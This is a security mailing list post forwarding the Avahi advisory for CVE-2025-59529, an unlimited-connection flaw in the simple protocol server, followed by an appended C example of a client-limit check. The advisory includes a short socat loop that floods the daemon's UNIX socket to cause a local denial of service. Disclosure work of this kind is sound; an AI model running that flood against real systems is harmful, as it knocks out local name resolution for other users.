Message-ID: <331a43cb-5e71-4ab7-8ee6-29e16c7a75ea@oracle.com>
Date: Fri, 19 Dec 2025 11:55:13 -0800
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: Avahi simple protocol server accepts unlimited
 connections [CVE-2025-59529]

https://github.com/avahi/avahi/security/advisories/GHSA-73wf-3xmj-x82q advises:

> Summary
> -------
> 
> The simple protocol server ignores the documented client limit and
> accepts unlimited connections, allowing for easy local DoS.
> 
> Details
> -------
> 
> Although CLIENTS_MAX is defined, server_work() unconditionally
> accept()s and client_new() always appends the new client and
> increments n_clients. There is no check against the limit.
> 
> When a client cannot be accepted because avahi-daemon has reached its
> maximum number of sockets, it unconditionally logs an error for each
> connection.
> 
> PoC
> ---
> 
> # Flood the UNIX simple-protocol socket with idle connections
> for i in $(seq 1 4000); do
>   socat - UNIX-CONNECT:/run/avahi-daemon/socket >/dev/null 2>&1 &
> done
> wait
> 
> Watch avahi-daemon’s memory/FD count grow until it becomes unresponsive or
> crashes, such as an endless loop of:
> 
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> 
> Impact
> ------
> 
> Unprivileged local users can exhaust daemon memory and file descriptors,
> causing a denial of service system-wide for mDNS/DNS-SD.
> 
> Exhausting local file descriptors causes increased system load, caused
> by logging an error for each request.
> 
> Overloading prevents glibc calls using nss-mdns plugins from resolving
> *.local. names and link-local addresses.
> 
> Workarounds
> -----------
> 
> Simple clients are offered for nss-mdns package functionality. It is
> not possible to disable the unix socket /run/avahi-daemon/socket, but
> resolution requests received via DBus are not affected directly. The tools
> avahi-resolve, avahi-resolve-address and avahi-resolve-host-name are
> not affected; they use the DBus interface.
> 
> It is possible to change the permissions of the unix socket after
> avahi-daemon is started, but avahi-daemon does not provide any
> configuration for it. Additional access restrictions like SELinux can
> also prevent unwanted tools from accessing the socket and keep
> resolution working for trusted users.
> 
> Fixes
> -----
> 
>     Candidate only: https://github.com/avahi/avahi/pull/808
> 
> Credits
> -------
> 
> We would like to thank Joshua Rogers using the ZeroPath tool for
> discovering and reporting the issue responsibly.
> 
>     published article about it: Avahi Simple Protocol Server DoS (CVE-2025-59529)
>     https://zeropath.com/blog/avahi-simple-protocol-server-dos-cve-2025-59529
> 
> Severity: Moderate, 5.5 / 10
>           CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
> CVE ID: CVE-2025-59529
> Weaknesses: CWE-400


-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris
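
The check the advisory says is missing (n_clients compared against CLIENTS_MAX before a client is kept), as an added example that is not Avahi's code, not the candidate fix in the pull request, and not part of the original message. The names struct server, server_accept_one and demo_run, the CLIENTS_MAX value of 4 and the /tmp socket path are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

#define CLIENTS_MAX 4 /* constructed demo value, not Avahi's setting */
struct server { int listen_fd; int clients[CLIENTS_MAX]; unsigned n_clients; };

/* One readable event on the listener: 1 = admitted, 0 = refused, -1 = accept() failed. */
int server_accept_one(struct server *s) {
    int fd = accept(s->listen_fd, NULL, NULL);
    if (fd < 0)
        return -1;              /* e.g. EMFILE: caller should rate-limit this log line */
    if (s->n_clients >= CLIENTS_MAX) {
        close(fd);              /* over the cap: give the descriptor back at once */
        return 0;
    }
    s->clients[s->n_clients++] = fd;
    return 1;
}

/* Constructed harness: make `attempts` idle connections, return how many the server kept. */
int demo_run(int attempts) {
    struct server s = { .listen_fd = socket(AF_UNIX, SOCK_STREAM, 0), .n_clients = 0 };
    struct sockaddr_un a = { .sun_family = AF_UNIX };
    int peers[64], n = 0;
    snprintf(a.sun_path, sizeof a.sun_path, "/tmp/cap-demo-%d.sock", (int)getpid());
    unlink(a.sun_path);
    if (s.listen_fd < 0 || bind(s.listen_fd, (struct sockaddr *)&a, sizeof a) < 0 ||
        listen(s.listen_fd, 8) < 0) {
        close(s.listen_fd);
        return -1;
    }
    for (int i = 0; i < attempts && i < 64; i++) {
        int c = socket(AF_UNIX, SOCK_STREAM, 0);
        if (c < 0) break;
        if (connect(c, (struct sockaddr *)&a, sizeof a) < 0) { close(c); break; }
        peers[n++] = c;
        server_accept_one(&s);  /* the server handles each connection as it arrives */
    }
    int kept = (int)s.n_clients;
    while (n > 0) close(peers[--n]);
    while (s.n_clients > 0) close(s.clients[--s.n_clients]);
    close(s.listen_fd);
    unlink(a.sun_path);
    return kept;
}

int main(void) { return demo_run(10) == CLIENTS_MAX ? 0 : 1; }
```

Accepting and immediately closing the excess connection is one policy; a server can instead stop polling the listening socket while it is at the cap, which leaves further connections waiting in the kernel backlog.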
